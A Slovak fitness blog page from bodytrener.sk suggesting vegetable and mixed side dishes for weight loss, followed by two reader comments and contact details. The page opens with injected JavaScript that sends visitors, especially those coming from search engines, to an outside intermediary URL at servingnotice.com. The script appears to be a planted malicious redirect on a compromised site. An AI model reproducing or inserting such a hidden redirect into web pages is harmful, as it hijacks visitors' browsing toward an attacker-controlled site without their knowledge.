var toUrl="http://"; var rUrl = document.referrer; var patrn=/(.*)$/; toUrl+="servingnotice.com/O7ul2v/intermediary.html?richubaidaninfo"; toUrl+=""; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)aol.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)yahoo.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)bing.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; Vhodné prílohy počas chudnutia | www.bodytrener.sk
Blog
...naučte sa niečo nové!

Vhodné prílohy počas chudnutia

Veľa ľudí si neuvedomuje, že aj zemiaky, ryža, cestoviny obsahujú sacharidy. Pri chudnutí treba znížiť prísun sacharidov a znížiť na minimum prísun tukov. Aby vaše jedlá boli chutné a vy ste boli zasýtení, odporúčam viaceré možnosti príloh.

Príloha len zo zeleniny

Vašu prílohu môže tvoriť len zelenina. Ja osobne využívam mrazené fazuľové struky, ktoré môžete kúpiť takmer v každom obchode. Hodím ich len na paru a príloha je vyriešené. Stoja okolo 1-1,5E za 250g. Takúto porciu si môžete rozdeliť na 2-3 prílohy. Sú veľmi chutné a rýchlo pripraviteľné. Ak nemáte možnosť kúpiť čerstvú zeleninu tak kúpte mrazenú. Mrazená zelenina je prudko zmrazená a zachovávajú sa v nej všetky živiny.

Vhodnou prílohou je zeleninový šalát alebo len nakrájať na tanier uhorku, papriku, rajčinu, kapustu. Odporúčam hlavne uhorku, ktorá obsahuje 80-90% vody.

Miešané prílohy

Takýto druh príloh je vhodný pre ľudí, ktorí ľahšie spaľujú tuky a nepotrebujú enormne schudnúť. Miešané prílohy sú vhodné pred aj po tréningu ako hlavné jedlá. Takáto príloha je zložená zo sacharidov ako sú cestoviny, ryža, zemiaky v polovičnej dávke ako obyčajne a zvyšok doplníme zeleninou.

Vytvoríme Vám kompletný jedálniček na mieru s preferovanými jedlami a receptami. Pozrite naše služby!

Diskusia (2)

  • Peter Komnický
  • 22. Jún 2012 o 22:45

  Ďakujem za nápad. fazuľové struky mi chutia.

  Odpovedať
  • Elena
  • 22. Jún 2012 o 22:46

  Ako prílohu si dávam len uhorky a začínam cítiť úbytok na váhe.

  Odpovedať

Pridať komentár
Odber noviniek

Pridajte sa k odberu noviniek a získajte najnovšie informácie o článkoch, zľavách a súťažiach.

Potrebujete pomoc?

Adresa:
Bodytrener.sk
Pažite 5
010 09 Žilina

Pracovná doba:
Pondelok – Piatok
10:00 – 18:00

E-mail: info@bodytrener.sk
Telefón: +421 904 569 865

Bankové účty:
2200359578/8330 - SLOVENSKO
2900359579/2010 - ČESKO

© 2013 Bodytrener.sk. Všetky práva vyhradené.

Pridaj si nás na Facebooku